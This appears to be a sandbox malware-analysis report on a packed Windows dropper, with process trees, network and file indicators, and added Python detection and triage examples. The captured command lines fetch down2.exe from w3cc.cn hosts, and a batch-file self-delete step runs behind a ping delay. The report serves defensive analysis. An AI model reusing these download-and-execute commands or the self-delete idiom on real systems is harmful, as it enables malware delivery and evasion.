Analysis Overview
SHA256
71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd
Threat Level: Shows suspicious behavior
The file adf042c909d919ccca72d1bcf7338e71 was classified as: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
ASPack v2.12-2.42
Loads dropped DLL
Checks computer location settings
Drops file in System32 directory
Unsigned PE
Enumerates physical storage devices
Runs ping.exe
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-29 06:45
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-29 06:45
Reported
2024-02-29 06:48
Platform
win7-20240221-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\yXvPpK.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\CjQlMj.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\McooHs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\DsaQDn.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\gpVDWz.exe | N/A |
Loads dropped DLL
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\yXvPpK.exe | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\yXvPpK.exe | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File created | C:\Windows\SysWOW64\CjQlMj.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File created | C:\Windows\SysWOW64\McooHs.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File created | C:\Windows\SysWOW64\DsaQDn.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File created | C:\Windows\SysWOW64\DelCAD.bat | C:\Windows\SysWOW64\CjQlMj.exe | N/A |
| File created | C:\Windows\SysWOW64\gpVDWz.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File created | C:\Windows\SysWOW64\DelCAD.bat | C:\Windows\SysWOW64\McooHs.exe | N/A |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe
"C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"
C:\Windows\SysWOW64\yXvPpK.exe
"C:\Windows\system32\yXvPpK.exe" showautoC:\Windows\system32\eMEgKoPo.dll
C:\Windows\SysWOW64\CjQlMj.exe
"C:\Windows\system32\CjQlMj.exe" C:\Windows\system32\BygFkM2.exe http://x6.w3cc.cn/dw/down2.exe
C:\Windows\SysWOW64\McooHs.exe
"C:\Windows\system32\McooHs.exe" C:\Windows\system32\zcynDy2.exe http://x2.w3cc.cn/dw/down2.exe
C:\Windows\SysWOW64\DsaQDn.exe
"C:\Windows\system32\DsaQDn.exe" C:\Windows\system32\YwLroS2.exe http://x4.w3cc.cn/dw/down2.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Windows\system32\DelCAD.bat
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\gpVDWz.exe
"C:\Windows\system32\gpVDWz.exe" C:\Windows\system32\kPcInM2.exe http://x2.w3cc.cn/dw/down2.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Windows\system32\DelCAD.bat
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
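The process list above shows the sequence this sample follows: the submitted file in %TEMP% copies itself into SysWOW64 (yXvPpK.exe carries the same MD5, SHA1 and SHA256 as the sample, see Files), starts several randomly named SysWOW64 binaries that are each handed a URL under w3cc.cn for down2.exe, and those in turn write DelCAD.bat and run it through cmd /c with a `ping -n 5 127.0.0.1` child, the usual loopback-sleep delay before a cleanup batch file (the contents of DelCAD.bat are not on this page). The Python below is an added detection example, not sandbox output and not code belonging to the sample; it runs three checks over constructed process-creation records modelled on this list. PIDs, parent links and the final benign cmd.exe row are assumptions, since the report gives image paths and command lines only.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # image path as the sandbox reports it
    cmdline: str    # command line as captured


# Constructed records modelled on the behavioral1 process list; PIDs, parent
# links and the last (benign) row are assumptions of this example.
EVENTS = [
    ProcEvent(1000, 500,
              r"C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"'),
    ProcEvent(1001, 1000, r"C:\Windows\SysWOW64\yXvPpK.exe",
              r'"C:\Windows\system32\yXvPpK.exe" showautoC:\Windows\system32\eMEgKoPo.dll'),
    ProcEvent(1002, 1000, r"C:\Windows\SysWOW64\CjQlMj.exe",
              r'"C:\Windows\system32\CjQlMj.exe" C:\Windows\system32\BygFkM2.exe http://x6.w3cc.cn/dw/down2.exe'),
    ProcEvent(1003, 1000, r"C:\Windows\SysWOW64\McooHs.exe",
              r'"C:\Windows\system32\McooHs.exe" C:\Windows\system32\zcynDy2.exe http://x2.w3cc.cn/dw/down2.exe'),
    ProcEvent(1004, 1002, r"C:\Windows\SysWOW64\cmd.exe", r"cmd /c C:\Windows\system32\DelCAD.bat"),
    ProcEvent(1005, 1004, r"C:\Windows\SysWOW64\PING.EXE", r"ping -n 5 127.0.0.1"),
    # benign control row: a .bat run from cmd with no ping child
    ProcEvent(1006, 700, r"C:\Windows\SysWOW64\cmd.exe", r"cmd /c C:\Users\Admin\backup.bat"),
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
WINDIR_RE = re.compile(r"^C:\\Windows\\", re.I)
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
BAT_RE = re.compile(r"/c\s+(\S+\.bat)\b", re.I)
PING_SLEEP_RE = re.compile(r"^ping(\.exe)?\s+-n\s+\d+\s+127\.0\.0\.1", re.I)


def _children(events):
    kids = {}
    for e in events:
        kids.setdefault(e.ppid, []).append(e)
    return kids


def temp_launches_windir(events):
    """PIDs of processes under C:\\Windows whose parent runs from %TEMP% (dropper -> dropped EXE)."""
    by_pid = {e.pid: e for e in events}
    return [e.pid for e in events
            if WINDIR_RE.match(e.image)
            and e.ppid in by_pid and TEMP_RE.search(by_pid[e.ppid].image)]


def downloader_hits(events):
    """(pid, image name, url) for binaries under C:\\Windows given a URL on the command line."""
    return [(e.pid, e.image.rsplit("\\", 1)[-1], url)
            for e in events if WINDIR_RE.match(e.image)
            for url in URL_RE.findall(e.cmdline)]


def self_delete_hits(events):
    """(pid, bat path) for 'cmd /c <x>.bat' whose child is 'ping -n N 127.0.0.1'."""
    kids = _children(events)
    hits = []
    for e in events:
        if not e.image.lower().endswith("\\cmd.exe"):
            continue
        m = BAT_RE.search(e.cmdline)
        if m and any(PING_SLEEP_RE.match(c.cmdline) for c in kids.get(e.pid, [])):
            hits.append((e.pid, m.group(1)))
    return hits


if __name__ == "__main__":
    print("temp -> windir launches:", temp_launches_windir(EVENTS))
    print("downloaders:", downloader_hits(EVENTS))
    print("self-delete idiom:", self_delete_hits(EVENTS))
```

The ping check deliberately keys on the parent being `cmd /c` with a .bat argument rather than on ping.exe alone, since `ping -n 5 127.0.0.1` on its own is common in legitimate scripts; the benign control row shows that a .bat without the ping child is not flagged. BAT_RE also matches the behavioral2 form `C:\Windows\system32\cmd.exe /c C:\Windows\system32\DelCAD.bat`.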
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | x6.w3cc.cn | udp |
| CN | 182.61.201.92:80 | x6.w3cc.cn | tcp |
| CN | 182.61.201.50:80 | x6.w3cc.cn | tcp |
| US | 8.8.8.8:53 | x2.w3cc.cn | udp |
| CN | 182.61.201.50:80 | x2.w3cc.cn | tcp |
| CN | 182.61.201.90:80 | x2.w3cc.cn | tcp |
| CN | 182.61.201.90:80 | x2.w3cc.cn | tcp |
| CN | 182.61.201.91:80 | x2.w3cc.cn | tcp |
| US | 8.8.8.8:53 | x4.w3cc.cn | udp |
| CN | 182.61.201.50:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.91:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.90:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.92:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.50:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.91:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.90:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.92:80 | x4.w3cc.cn | tcp |
Files
C:\Windows\SysWOW64\yXvPpK.exe
| MD5 | adf042c909d919ccca72d1bcf7338e71 |
| SHA1 | bf9be4f139b3742d94593f3079f1f8836e5f5bb4 |
| SHA256 | 71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd |
| SHA512 | d8df82387b3b5630f14cb143b5c0e890f49fbd23cc298d8dca1dbe839ce8dc00bb0eb8f75ce546c33242b75e413625fe52f469416b316628f1bf10d3129db173 |
\Windows\SysWOW64\CjQlMj.exe
| MD5 | 78cd588e48bf05f83ac4d2e5bd3d32e2 |
| SHA1 | c96060325a397b397a1d60076ce6e2c11f309a4f |
| SHA256 | 5309590bc560b29b521f62e20b8d31ef848501814542939b6b943add30afa85e |
| SHA512 | 8cddb7332eec1e036b8466dd07c36557e471e531bfb191254d9c79d1212115378adc0a3111b983c168ce9fe09230ed1797dca4ab30fe16c3f735b98cee273e65 |
memory/2552-19-0x0000000000400000-0x0000000000418000-memory.dmp
memory/2172-34-0x0000000000400000-0x0000000000418000-memory.dmp
C:\Windows\SysWOW64\DelCAD.bat
| MD5 | 55ddc7c397dac5382bffc27028613cf2 |
| SHA1 | cd1ec3db09b2c87dbc12af0cee2e61c2811b7248 |
| SHA256 | 7af73cc02994867d8df3f7f35ba4b6533566fa66b0a332fcdd6154eaba8268f1 |
| SHA512 | bd47ce4081fda66661ac783618e3caf38c86012b669e25e10c376f696c468ac867f955f3ae33e4d9633df7c2ac7e5b9606f17064589343ba562cb8fe954b6026 |
memory/2552-58-0x0000000000400000-0x0000000000418000-memory.dmp
memory/1592-62-0x0000000000400000-0x0000000000418000-memory.dmp
C:\Windows\SysWOW64\DelCAD.bat
| MD5 | 3b9f74672e6599f4d582d25049c67775 |
| SHA1 | b07fea6b6986218b56665ff196295e53a1ab9028 |
| SHA256 | 60439805131c49c394e0a28e070e4a7ca6956eb3e0c3c7137d16993fa3217311 |
| SHA512 | 8791d98b7ab472d43595f1c85d4c21916eae04b294d8e1c1ed5685fb94d64b3e7236b1e917c784395f13c9ce9521df14978d3e6ecec21b1bb8ebf0f04569acfb |
memory/2172-86-0x0000000000400000-0x0000000000418000-memory.dmp
memory/888-90-0x0000000000400000-0x0000000000418000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-29 06:45
Reported
2024-02-29 06:48
Platform
win10v2004-20240226-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\SOupMF.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\DMWgpy.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\xBjOcu.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\RMsoSA.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\eytYFB.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\DMWgpy.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File created | C:\Windows\SysWOW64\xBjOcu.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File created | C:\Windows\SysWOW64\RMsoSA.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File created | C:\Windows\SysWOW64\DelCAD.bat | C:\Windows\SysWOW64\DMWgpy.exe | N/A |
| File created | C:\Windows\SysWOW64\eytYFB.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File created | C:\Windows\SysWOW64\DelCAD.bat | C:\Windows\SysWOW64\xBjOcu.exe | N/A |
| File created | C:\Windows\SysWOW64\SOupMF.exe | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\SOupMF.exe | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe
"C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"
C:\Windows\SysWOW64\SOupMF.exe
"C:\Windows\system32\SOupMF.exe" showautoC:\Windows\system32\RQYknvIR.dll
C:\Windows\SysWOW64\DMWgpy.exe
"C:\Windows\system32\DMWgpy.exe" C:\Windows\system32\JSNVfa2.exe http://x2.w3cc.cn/dw/down2.exe
C:\Windows\SysWOW64\xBjOcu.exe
"C:\Windows\system32\xBjOcu.exe" C:\Windows\system32\vEzIRa2.exe http://x3.w3cc.cn/dw/down2.exe
C:\Windows\SysWOW64\RMsoSA.exe
"C:\Windows\system32\RMsoSA.exe" C:\Windows\system32\DyeLGo2.exe http://x4.w3cc.cn/dw/down2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\system32\DelCAD.bat
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\eytYFB.exe
"C:\Windows\system32\eytYFB.exe" C:\Windows\system32\sFAvzS2.exe http://x3.w3cc.cn/dw/down2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\system32\DelCAD.bat
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | x2.w3cc.cn | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| CN | 182.61.201.90:80 | x2.w3cc.cn | tcp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| CN | 182.61.201.91:80 | x2.w3cc.cn | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | x3.w3cc.cn | udp |
| CN | 182.61.201.90:80 | x3.w3cc.cn | tcp |
| CN | 182.61.201.92:80 | x3.w3cc.cn | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| CN | 182.61.201.91:80 | x3.w3cc.cn | tcp |
| CN | 182.61.201.50:80 | x3.w3cc.cn | tcp |
| US | 8.8.8.8:53 | x4.w3cc.cn | udp |
| CN | 182.61.201.50:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.92:80 | x4.w3cc.cn | tcp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| CN | 182.61.201.90:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.50:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.90:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.91:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.91:80 | x4.w3cc.cn | tcp |
| CN | 182.61.201.92:80 | x4.w3cc.cn | tcp |
| US | 8.8.8.8:53 | 214.80.50.20.in-addr.arpa | udp |
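Only the w3cc.cn hosts in the table above are sample activity: the 8.8.8.8 rows are the sandbox's resolver, the in-addr.arpa names are reverse lookups, and g.bing.com is background traffic of the Windows 10 image. The Python below is an added triage example, not part of the report, that applies that split to a constructed subset of the rows, keeps only the domains that were actually connected to (a name that was merely resolved is reported separately), counts connections per endpoint and computes the tightest CIDR enclosing every contacted address. Treating the resolver, the reverse lookups and Bing as noise is an assumption of the example.

```python
import ipaddress
from collections import Counter, defaultdict

# Constructed subset of the behavioral2 Network table (country, destination, domain, proto).
ROWS = [
    ("US", "8.8.8.8:53", "76.32.126.40.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "x2.w3cc.cn", "udp"),
    ("US", "8.8.8.8:53", "g.bing.com", "udp"),
    ("US", "204.79.197.200:443", "g.bing.com", "tcp"),
    ("CN", "182.61.201.90:80", "x2.w3cc.cn", "tcp"),
    ("CN", "182.61.201.91:80", "x2.w3cc.cn", "tcp"),
    ("US", "8.8.8.8:53", "x3.w3cc.cn", "udp"),
    ("CN", "182.61.201.90:80", "x3.w3cc.cn", "tcp"),
    ("CN", "182.61.201.92:80", "x3.w3cc.cn", "tcp"),
    ("US", "8.8.8.8:53", "x4.w3cc.cn", "udp"),
    ("CN", "182.61.201.50:80", "x4.w3cc.cn", "tcp"),
    ("CN", "182.61.201.90:80", "x4.w3cc.cn", "tcp"),
    ("US", "8.8.8.8:53", "214.80.50.20.in-addr.arpa", "udp"),
]

# Analysis-image background traffic, not sample activity. Classing the reverse
# lookups and the Bing host as noise is an assumption of this example.
NOISE_SUFFIXES = (".in-addr.arpa", "bing.com")
RESOLVERS = {"8.8.8.8"}


def triage(rows):
    """Split the table into contacted domains/IPs, resolved-only names and per-endpoint counts."""
    resolved, contacted = set(), defaultdict(set)
    conns = Counter()
    for _country, dest, domain, proto in rows:
        ip, port = dest.rsplit(":", 1)
        if domain.endswith(NOISE_SUFFIXES):
            continue
        if ip in RESOLVERS and port == "53" and proto == "udp":
            resolved.add(domain)          # a lookup alone is not a contact
            continue
        contacted[domain].add(ip)
        conns[(ip, port)] += 1
    return {
        "domains": set(contacted),
        "ips": {ip for ips in contacted.values() for ip in ips},
        "dns_only": resolved - set(contacted),
        "connections": dict(conns),
        "per_domain": {d: sorted(ips) for d, ips in contacted.items()},
    }


def smallest_supernet(ips):
    """Tightest CIDR that encloses every address; widens one prefix bit at a time."""
    nets = [ipaddress.ip_network(ip) for ip in ips]
    net = nets[0]
    while not all(n.subnet_of(net) for n in nets):
        net = net.supernet()
    return str(net)


if __name__ == "__main__":
    result = triage(ROWS)
    for key, value in result.items():
        print(f"{key}: {value}")
    print("enclosing block:", smallest_supernet(result["ips"]))
```

For these rows every contacted address sits in 182.61.201.0/25 and 182.61.201.90 is reused by all three domains, which is what makes the /25 and the individual IPs worth blocking alongside the x*.w3cc.cn names; a resolved-but-never-contacted name would land in `dns_only` and should be confirmed before being promoted to an indicator.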
Files
C:\Windows\SysWOW64\SOupMF.exe
| MD5 | adf042c909d919ccca72d1bcf7338e71 |
| SHA1 | bf9be4f139b3742d94593f3079f1f8836e5f5bb4 |
| SHA256 | 71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd |
| SHA512 | d8df82387b3b5630f14cb143b5c0e890f49fbd23cc298d8dca1dbe839ce8dc00bb0eb8f75ce546c33242b75e413625fe52f469416b316628f1bf10d3129db173 |
C:\Windows\SysWOW64\DMWgpy.exe
| MD5 | 78cd588e48bf05f83ac4d2e5bd3d32e2 |
| SHA1 | c96060325a397b397a1d60076ce6e2c11f309a4f |
| SHA256 | 5309590bc560b29b521f62e20b8d31ef848501814542939b6b943add30afa85e |
| SHA512 | 8cddb7332eec1e036b8466dd07c36557e471e531bfb191254d9c79d1212115378adc0a3111b983c168ce9fe09230ed1797dca4ab30fe16c3f735b98cee273e65 |
memory/3096-17-0x0000000000400000-0x0000000000418000-memory.dmp
memory/3884-31-0x0000000000400000-0x0000000000418000-memory.dmp
memory/3096-49-0x0000000000400000-0x0000000000418000-memory.dmp
C:\Windows\SysWOW64\DelCAD.bat
| MD5 | 9c439a87b83755cde8511cf65e13e54e |
| SHA1 | a72df147498f15d16d4004f73733d2602390e981 |
| SHA256 | d7c7639aa7fbe036c11bf35908fb2aa26171902482bb250233af19cd8f655bf3 |
| SHA512 | c483a77a2496f2daca73613be8a317c6fbf92de9cb569a0dd75a27f30fa4d6f251a4a1d26e3808716128cf4f48c72cbd81b5380c9b2d981be9be300eb49155eb |
memory/3108-52-0x0000000000400000-0x0000000000418000-memory.dmp
memory/3884-70-0x0000000000400000-0x0000000000418000-memory.dmp
C:\Windows\SysWOW64\DelCAD.bat
| MD5 | 544926ed36528740dfc1d64a602e6d5c |
| SHA1 | 7837ae9e7da6054b79b1f1cbe810d838ed0ee3c5 |
| SHA256 | 6e7bd49e44ffa47502cceb6fcf39dcb048d716cbe9f95b360c145b5fea64eec7 |
| SHA512 | 8425d3c4282b576878c5ecc2a327634399338e626fd738192d2c766f8ecfa7f4bf539b476757c9174f111b6b7d108a39f90aaffcdc4b93ffda65b5594cb7210b |
memory/5104-73-0x0000000000400000-0x0000000000418000-memory.dmp